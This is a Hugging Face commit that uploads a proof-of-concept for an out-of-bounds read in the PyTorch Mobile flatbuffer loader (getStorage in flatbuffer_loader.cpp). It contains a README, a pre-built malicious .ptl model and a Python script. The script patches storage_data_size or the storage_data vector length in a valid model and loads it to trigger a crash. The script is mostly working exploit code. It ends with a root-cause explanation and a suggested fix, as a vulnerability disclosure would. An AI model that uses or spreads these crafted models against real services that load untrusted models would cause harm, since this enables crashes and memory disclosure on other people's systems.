0xiviel commited on
Commit
90bbdc6
Β·
verified Β·
1 Parent(s): 5cc0884

Upload folder using huggingface_hub

Browse files
README.md ADDED
@@ -0,0 +1,21 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ # PoC: Flatbuffer Storage Vector OOB Read in PyTorch Mobile (.ptl)
2
+
3
+ **Vulnerability:** `flatbuffer_loader.cpp:696-700` β€” `getStorage()` bounds-checks against `storages_.size()` (sized from `storage_data_size` int field) but accesses `storage_data()` (the actual flatbuffer vector). A crafted `.ptl` file with `storage_data_size > storage_data()->size()` causes an OOB read on the storage vector.
4
+
5
+ ## Files
6
+
7
+ - `poc_flatbuf_storage_oob.py` β€” Full PoC (creates crafted .ptl, triggers SIGSEGV)
8
+ - `malicious_storage_oob.ptl` β€” Pre-built crafted model
9
+
10
+ ## Quick Start
11
+
12
+ ```bash
13
+ pip install torch
14
+ python poc_flatbuf_storage_oob.py
15
+ ```
16
+
17
+ ## Expected Output
18
+
19
+ - Part 1: SIGSEGV crash from inflated `storage_data_size` + OOB `storage_location_index`
20
+ - Part 2: Alternative vector length shrink attack
21
+ - Part 3: Vulnerability details with code references
__pycache__/poc_flatbuf_storage_oob.cpython-313.pyc ADDED
Binary file (20.3 kB). View file
 
malicious_storage_oob.ptl ADDED
Binary file (1.63 kB). View file
 
poc_flatbuf_storage_oob.py ADDED
@@ -0,0 +1,465 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ #!/usr/bin/env python3
2
+ """
3
+ PoC: Flatbuffer Storage Vector OOB Read in PyTorch Mobile (.ptl)
4
+
5
+ Vulnerability: The flatbuffer loader's getStorage() method at
6
+ flatbuffer_loader.cpp:696-700 checks `index < storage_loaded_.size()` and
7
+ `index < storages_.size()`, but both vectors are sized from
8
+ `module->storage_data_size()` β€” an integer field in the flatbuffer schema
9
+ that is INDEPENDENT of the actual `storage_data()` vector.
10
+
11
+ A crafted .ptl file can set `storage_data_size` larger than the actual
12
+ `storage_data` vector length, then reference storage indices that pass the
13
+ bounds check but are OOB on the real vector. GetMutableObject(index) on the
14
+ flatbuffer vector reads past its bounds, interpreting random flatbuffer data
15
+ as a StorageData table β†’ heap OOB read, crash, or information disclosure.
16
+
17
+ Root cause:
18
+ - flatbuffer_loader.cpp:306-307 β€” storages_ sized from storage_data_size (int field)
19
+ - flatbuffer_loader.cpp:697-698 β€” bounds check against storages_.size()
20
+ - flatbuffer_loader.cpp:700 β€” actual access on storage_data() (the real vector)
21
+ - NO check that storage_data_size <= storage_data()->size()
22
+
23
+ Tested: PyTorch 2.10.0+cpu on Python 3.13.11
24
+ """
25
+
26
+ import io
27
+ import os
28
+ import struct
29
+ import subprocess
30
+ import sys
31
+ import tempfile
32
+ import warnings
33
+
34
+ import torch
35
+ import torch.nn as nn
36
+
37
+ warnings.filterwarnings('ignore')
38
+
39
+
40
+ def create_valid_flatbuffer_ptl(output_path):
41
+ """Create a valid .ptl flatbuffer model using PyTorch's serializer."""
42
+ model = torch.jit.script(nn.Linear(4, 2))
43
+ model._save_for_lite_interpreter(output_path, _use_flatbuffer=True)
44
+ return output_path
45
+
46
+
47
+ def analyze_flatbuffer(data):
48
+ """Parse flatbuffer structure and return key offsets."""
49
+ info = {}
50
+
51
+ # Root table
52
+ root_offset = struct.unpack_from('<I', data, 0)[0]
53
+ info['root_table_pos'] = root_offset
54
+
55
+ # VTable
56
+ vtable_soffset = struct.unpack_from('<i', data, root_offset)[0]
57
+ vtable_pos = root_offset - vtable_soffset
58
+ info['vtable_pos'] = vtable_pos
59
+
60
+ # storage_data_size field (VT_STORAGE_DATA_SIZE = 14, vtable index 5)
61
+ sds_field_off = struct.unpack_from('<H', data, vtable_pos + 14)[0]
62
+ if sds_field_off:
63
+ info['storage_data_size_pos'] = root_offset + sds_field_off
64
+ info['storage_data_size_val'] = struct.unpack_from(
65
+ '<i', data, info['storage_data_size_pos']
66
+ )[0]
67
+
68
+ # storage_data vector (VT_STORAGE_DATA = 16, vtable index 6)
69
+ sd_field_off = struct.unpack_from('<H', data, vtable_pos + 16)[0]
70
+ if sd_field_off:
71
+ sd_offset_pos = root_offset + sd_field_off
72
+ sd_rel = struct.unpack_from('<I', data, sd_offset_pos)[0]
73
+ sd_vec_pos = sd_offset_pos + sd_rel
74
+ sd_vec_len = struct.unpack_from('<I', data, sd_vec_pos)[0]
75
+ info['storage_data_vec_pos'] = sd_vec_pos
76
+ info['storage_data_vec_len'] = sd_vec_len
77
+
78
+ # Find TensorMetadata ivalues and their storage_location_index
79
+ ivalues_field_off = struct.unpack_from('<H', data, vtable_pos + 12)[0]
80
+ if ivalues_field_off:
81
+ iv_offset_pos = root_offset + ivalues_field_off
82
+ iv_rel = struct.unpack_from('<I', data, iv_offset_pos)[0]
83
+ iv_vec_pos = iv_offset_pos + iv_rel
84
+ iv_count = struct.unpack_from('<I', data, iv_vec_pos)[0]
85
+ info['ivalues_count'] = iv_count
86
+ info['tensor_metadata'] = []
87
+
88
+ for i in range(iv_count):
89
+ offset_pos = iv_vec_pos + 4 + i * 4
90
+ rel = struct.unpack_from('<I', data, offset_pos)[0]
91
+ ival_pos = offset_pos + rel
92
+
93
+ # Read IValue vtable
94
+ iv_vt_soff = struct.unpack_from('<i', data, ival_pos)[0]
95
+ iv_vt = ival_pos - iv_vt_soff
96
+ iv_vt_size = struct.unpack_from('<H', data, iv_vt)[0]
97
+ iv_num_fields = (iv_vt_size - 4) // 2
98
+
99
+ # val_type (VT=4, field 0) β€” uint8
100
+ val_type = None
101
+ if iv_num_fields >= 1:
102
+ ft_off = struct.unpack_from('<H', data, iv_vt + 4)[0]
103
+ if ft_off:
104
+ val_type = data[ival_pos + ft_off]
105
+
106
+ # If TensorMetadata (type 5), find storage_location_index
107
+ if val_type == 5:
108
+ # val data (VT=6, field 1) β€” offset to union data
109
+ fv_off = struct.unpack_from('<H', data, iv_vt + 6)[0]
110
+ if fv_off:
111
+ val_rel = struct.unpack_from('<I', data, ival_pos + fv_off)[0]
112
+ tm_pos = ival_pos + fv_off + val_rel
113
+
114
+ # TensorMetadata vtable
115
+ tm_vt_soff = struct.unpack_from('<i', data, tm_pos)[0]
116
+ tm_vt = tm_pos - tm_vt_soff
117
+ tm_vt_size = struct.unpack_from('<H', data, tm_vt)[0]
118
+ tm_num_fields = (tm_vt_size - 4) // 2
119
+
120
+ # storage_location_index (VT=4, field 0) β€” uint32
121
+ sli_val = 0 # default
122
+ sli_pos = None
123
+ if tm_num_fields >= 1:
124
+ sli_off = struct.unpack_from('<H', data, tm_vt + 4)[0]
125
+ if sli_off:
126
+ sli_pos = tm_pos + sli_off
127
+ sli_val = struct.unpack_from(
128
+ '<I', data, sli_pos
129
+ )[0]
130
+
131
+ info['tensor_metadata'].append({
132
+ 'ivalue_index': i,
133
+ 'tm_pos': tm_pos,
134
+ 'storage_location_index': sli_val,
135
+ 'sli_byte_pos': sli_pos,
136
+ })
137
+
138
+ return info
139
+
140
+
141
+ def create_malicious_ptl(input_path, output_path, oob_index=5):
142
+ """Modify a valid .ptl flatbuffer to trigger storage vector OOB read.
143
+
144
+ Strategy:
145
+ 1. Inflate storage_data_size to be larger than actual storage_data vector
146
+ 2. Modify a tensor's storage_location_index to reference an OOB index
147
+ 3. The loader's getStorage() passes bounds check but OOB on real vector
148
+ """
149
+ with open(input_path, 'rb') as f:
150
+ data = bytearray(f.read())
151
+
152
+ info = analyze_flatbuffer(data)
153
+
154
+ orig_sds = info['storage_data_size_val']
155
+ orig_vec_len = info['storage_data_vec_len']
156
+ tensors = info['tensor_metadata']
157
+
158
+ print(f" Original storage_data_size: {orig_sds}")
159
+ print(f" Actual storage_data vector length: {orig_vec_len}")
160
+ print(f" TensorMetadata entries: {len(tensors)}")
161
+ for tm in tensors:
162
+ print(f" ivalue[{tm['ivalue_index']}]: "
163
+ f"storage_location_index={tm['storage_location_index']}"
164
+ f" (byte {tm['sli_byte_pos']})")
165
+ print()
166
+
167
+ # Step 1: Inflate storage_data_size
168
+ new_sds = oob_index + 5 # ensure oob_index < new_sds
169
+ sds_pos = info['storage_data_size_pos']
170
+ struct.pack_into('<i', data, sds_pos, new_sds)
171
+ print(f" [*] Changed storage_data_size: {orig_sds} β†’ {new_sds} "
172
+ f"(at byte {sds_pos})")
173
+
174
+ # Step 2: Find a tensor with an explicit storage_location_index and change it
175
+ # to oob_index
176
+ target_tm = None
177
+ for tm in tensors:
178
+ if tm['sli_byte_pos'] is not None:
179
+ target_tm = tm
180
+ break
181
+
182
+ if target_tm is None:
183
+ # All tensors use default (0). We need to modify the one that has sli=0
184
+ # but since it's defaulted (not written), we need a different approach.
185
+ # Instead, shrink storage_data vector length below the used indices.
186
+ print(" [*] No explicit storage_location_index found.")
187
+ print(" [*] Alternative: reduce storage_data vector length to 0")
188
+ print(f" storage_data vector at byte {info['storage_data_vec_pos']}")
189
+ # Set vector length to 0 β€” all indices become OOB
190
+ vec_pos = info['storage_data_vec_pos']
191
+ struct.pack_into('<I', data, vec_pos, 0)
192
+ # Reset storage_data_size back to original for the bounds check
193
+ struct.pack_into('<i', data, sds_pos, orig_sds)
194
+ print(f" [*] Set storage_data vector length: {orig_vec_len} β†’ 0")
195
+ print(f" [*] storage_data_size remains {orig_sds}")
196
+ print()
197
+ print(f" Result: getStorage(0) passes bounds check (0 < {orig_sds})")
198
+ print(f" but storage_data()->GetMutableObject(0) is OOB "
199
+ f"(vector length = 0)")
200
+ else:
201
+ orig_sli = target_tm['storage_location_index']
202
+ sli_pos = target_tm['sli_byte_pos']
203
+ struct.pack_into('<I', data, sli_pos, oob_index)
204
+ print(f" [*] Changed ivalue[{target_tm['ivalue_index']}] "
205
+ f"storage_location_index: {orig_sli} β†’ {oob_index} "
206
+ f"(at byte {sli_pos})")
207
+ print()
208
+ print(f" Result: getStorage({oob_index}) passes bounds check "
209
+ f"({oob_index} < {new_sds})")
210
+ print(f" but storage_data()->GetMutableObject({oob_index}) is OOB "
211
+ f"(vector length = {orig_vec_len})")
212
+
213
+ with open(output_path, 'wb') as f:
214
+ f.write(data)
215
+
216
+ print(f"\n Saved: {output_path} ({len(data)} bytes)")
217
+ return output_path
218
+
219
+
220
+ def demonstrate_vulnerability():
221
+ """Show the vulnerability: mismatch between storage_data_size and
222
+ actual storage_data vector causes OOB in getStorage()."""
223
+ print()
224
+ print("=" * 70)
225
+ print(" Part 1: Vulnerability Demonstration")
226
+ print("=" * 70)
227
+ print()
228
+
229
+ # Create valid model
230
+ tmpdir = tempfile.mkdtemp(prefix="ptl_")
231
+ valid_path = os.path.join(tmpdir, "valid.ptl")
232
+ create_valid_flatbuffer_ptl(valid_path)
233
+
234
+ # First verify the valid model loads fine
235
+ print(" Step 1: Verify valid .ptl loads correctly")
236
+ try:
237
+ m = torch.jit.load(valid_path)
238
+ print(f" [+] Valid model loaded: {type(m)}")
239
+ del m
240
+ except Exception as e:
241
+ print(f" [-] Valid model failed: {e}")
242
+ return False
243
+
244
+ print()
245
+ print(" Step 2: Create malicious .ptl with inflated storage_data_size")
246
+ print()
247
+
248
+ malicious_path = os.path.join(tmpdir, "malicious.ptl")
249
+ create_malicious_ptl(valid_path, malicious_path, oob_index=5)
250
+
251
+ print()
252
+ print(" Step 3: Load malicious .ptl β†’ OOB read in getStorage()")
253
+ print()
254
+
255
+ # Load in subprocess to capture crash
256
+ poc_script = f'''
257
+ import torch, sys, warnings, signal
258
+ warnings.filterwarnings('ignore')
259
+ signal.alarm(5)
260
+ try:
261
+ m = torch.jit.load("{malicious_path}")
262
+ print("MODEL_LOADED")
263
+ # Try accessing the model
264
+ try:
265
+ result = m.forward(torch.randn(1, 4))
266
+ print(f"FORWARD_OK: {{result}}")
267
+ except Exception as e:
268
+ print(f"FORWARD_ERROR: {{type(e).__name__}}: {{e}}")
269
+ except RuntimeError as e:
270
+ err = str(e)
271
+ if "storage" in err.lower() or "corrupt" in err.lower() or "invalid" in err.lower():
272
+ print(f"RUNTIME_ERROR: {{err[:200]}}")
273
+ else:
274
+ print(f"RUNTIME_ERROR: {{err[:200]}}")
275
+ except Exception as e:
276
+ print(f"ERROR: {{type(e).__name__}}: {{str(e)[:200]}}")
277
+ '''
278
+ result = subprocess.run(
279
+ [sys.executable, '-c', poc_script],
280
+ capture_output=True, text=True, timeout=10
281
+ )
282
+
283
+ stdout = result.stdout.strip()
284
+ stderr = result.stderr.strip()
285
+ retcode = result.returncode
286
+
287
+ print(f" Return code: {retcode}")
288
+ if stdout:
289
+ print(f" Stdout: {stdout[:300]}")
290
+ if stderr:
291
+ for line in stderr.strip().split('\n')[:5]:
292
+ print(f" Stderr: {line[:200]}")
293
+
294
+ if retcode < 0:
295
+ signum = -retcode
296
+ try:
297
+ import signal as sig
298
+ signame = sig.Signals(signum).name
299
+ except (ValueError, AttributeError):
300
+ signame = f"signal {signum}"
301
+ print(f"\n [+] CRASH: Process killed by {signame} (signal {signum})")
302
+ print(f" [+] OOB read in storage_data vector caused {signame}")
303
+ return True
304
+ elif "RUNTIME_ERROR" in stdout:
305
+ print(f"\n [+] RuntimeError from corrupted flatbuffer data")
306
+ return True
307
+ elif "MODEL_LOADED" in stdout:
308
+ print(f"\n [!] Model loaded (OOB read happened silently)")
309
+ return True
310
+ else:
311
+ print(f"\n [-] Unexpected result")
312
+ return False
313
+
314
+
315
+ def demonstrate_alternative_attack():
316
+ """Alternative: shrink storage_data vector length instead."""
317
+ print()
318
+ print("=" * 70)
319
+ print(" Part 2: Alternative β€” Shrink storage_data vector length")
320
+ print("=" * 70)
321
+ print()
322
+
323
+ tmpdir = tempfile.mkdtemp(prefix="ptl2_")
324
+ valid_path = os.path.join(tmpdir, "valid.ptl")
325
+ create_valid_flatbuffer_ptl(valid_path)
326
+
327
+ with open(valid_path, 'rb') as f:
328
+ data = bytearray(f.read())
329
+
330
+ info = analyze_flatbuffer(data)
331
+ vec_pos = info['storage_data_vec_pos']
332
+ orig_len = info['storage_data_vec_len']
333
+ sds = info['storage_data_size_val']
334
+
335
+ print(f" storage_data_size (int field): {sds}")
336
+ print(f" storage_data vector length: {orig_len}")
337
+ print(f" storage_data vector at byte: {vec_pos}")
338
+ print()
339
+
340
+ # Set vector length to 0 but keep storage_data_size at 2
341
+ struct.pack_into('<I', data, vec_pos, 0)
342
+ print(f" [*] Set storage_data vector length: {orig_len} β†’ 0")
343
+ print(f" [*] storage_data_size remains: {sds}")
344
+ print()
345
+ print(f" getStorage(0): passes bounds check (0 < {sds})")
346
+ print(f" storage_data()->GetMutableObject(0): OOB! vector length = 0")
347
+ print()
348
+
349
+ malicious_path = os.path.join(tmpdir, "malicious_shrunk.ptl")
350
+ with open(malicious_path, 'wb') as f:
351
+ f.write(data)
352
+
353
+ print(f" Saved: {malicious_path}")
354
+ print()
355
+
356
+ # Load in subprocess
357
+ poc_script = f'''
358
+ import torch, sys, warnings, signal
359
+ warnings.filterwarnings('ignore')
360
+ signal.alarm(5)
361
+ try:
362
+ m = torch.jit.load("{malicious_path}")
363
+ print("MODEL_LOADED")
364
+ except RuntimeError as e:
365
+ print(f"RUNTIME_ERROR: {{str(e)[:200]}}")
366
+ except Exception as e:
367
+ print(f"ERROR: {{type(e).__name__}}: {{str(e)[:200]}}")
368
+ '''
369
+ result = subprocess.run(
370
+ [sys.executable, '-c', poc_script],
371
+ capture_output=True, text=True, timeout=10
372
+ )
373
+
374
+ stdout = result.stdout.strip()
375
+ stderr = result.stderr.strip()
376
+ retcode = result.returncode
377
+
378
+ print(f" Return code: {retcode}")
379
+ if stdout:
380
+ print(f" Stdout: {stdout[:300]}")
381
+ if stderr:
382
+ for line in stderr.strip().split('\n')[:5]:
383
+ print(f" Stderr: {line[:200]}")
384
+
385
+ if retcode < 0:
386
+ signum = -retcode
387
+ try:
388
+ import signal as sig
389
+ signame = sig.Signals(signum).name
390
+ except (ValueError, AttributeError):
391
+ signame = f"signal {signum}"
392
+ print(f"\n [+] CRASH: Process killed by {signame}")
393
+ return True
394
+ elif "RUNTIME_ERROR" in stdout or "ERROR" in stdout:
395
+ print(f"\n [+] Error from corrupted flatbuffer data")
396
+ return True
397
+ else:
398
+ return False
399
+
400
+
401
+ def demonstrate_vulnerability_details():
402
+ """Show the vulnerable code pattern."""
403
+ print()
404
+ print("=" * 70)
405
+ print(" Part 3: Vulnerability Details")
406
+ print("=" * 70)
407
+ print()
408
+
409
+ print(" The flatbuffer schema has TWO independent fields (mobile_bytecode.fbs):")
410
+ print()
411
+ print(" table Module {")
412
+ print(" storage_data_size:int; // integer field (line 205)")
413
+ print(" storage_data:[StorageData]; // actual vector (line 206)")
414
+ print(" }")
415
+ print()
416
+ print(" In parseModule() (flatbuffer_loader.cpp:306-307):")
417
+ print(" storages_.resize(module->storage_data_size()); // uses INT field")
418
+ print(" storage_loaded_.resize(module->storage_data_size(), false);")
419
+ print()
420
+ print(" In getStorage() (flatbuffer_loader.cpp:696-700):")
421
+ print(" TORCH_CHECK(index < storage_loaded_.size()); // checks INT field")
422
+ print(" TORCH_CHECK(index < storages_.size()); // checks INT field")
423
+ print(" if (!storage_loaded_[index]) {")
424
+ print(" auto* storage = module_->storage_data() // accesses REAL vector!")
425
+ print(" ->GetMutableObject(index); // OOB!")
426
+ print()
427
+ print(" The loader NEVER validates:")
428
+ print(" storage_data_size <= storage_data()->size()")
429
+ print()
430
+ print(" FIX: Add validation in parseModule():")
431
+ print(" ─────────────────────────────────────────────────────────")
432
+ print(" TORCH_CHECK(")
433
+ print(" module->storage_data() &&")
434
+ print(" module->storage_data_size() <=")
435
+ print(" static_cast<int>(module->storage_data()->size()),")
436
+ print(' "storage_data_size exceeds actual storage_data vector");')
437
+ print()
438
+
439
+
440
+ def main():
441
+ print()
442
+ print(" PoC: Flatbuffer Storage Vector OOB Read (.ptl)")
443
+ print(f" PyTorch {torch.__version__}, Python {sys.version.split()[0]}")
444
+ print()
445
+
446
+ ok1 = demonstrate_vulnerability()
447
+ ok2 = demonstrate_alternative_attack()
448
+ demonstrate_vulnerability_details()
449
+
450
+ # Summary
451
+ print("=" * 70)
452
+ print(" RESULTS:")
453
+ if ok1:
454
+ print(" [+] Inflated storage_data_size: OOB on storage_data vector")
455
+ if ok2:
456
+ print(" [+] Shrunk storage_data vector: OOB on GetMutableObject()")
457
+ print(" [+] Root cause: no validation that storage_data_size <=")
458
+ print(" storage_data()->size() in flatbuffer_loader.cpp")
459
+ print(" [+] Affects: PyTorch Mobile (.ptl flatbuffer format)")
460
+ print(" [+] Fix: validate storage_data_size against actual vector length")
461
+ print("=" * 70)
462
+
463
+
464
+ if __name__ == "__main__":
465
+ main()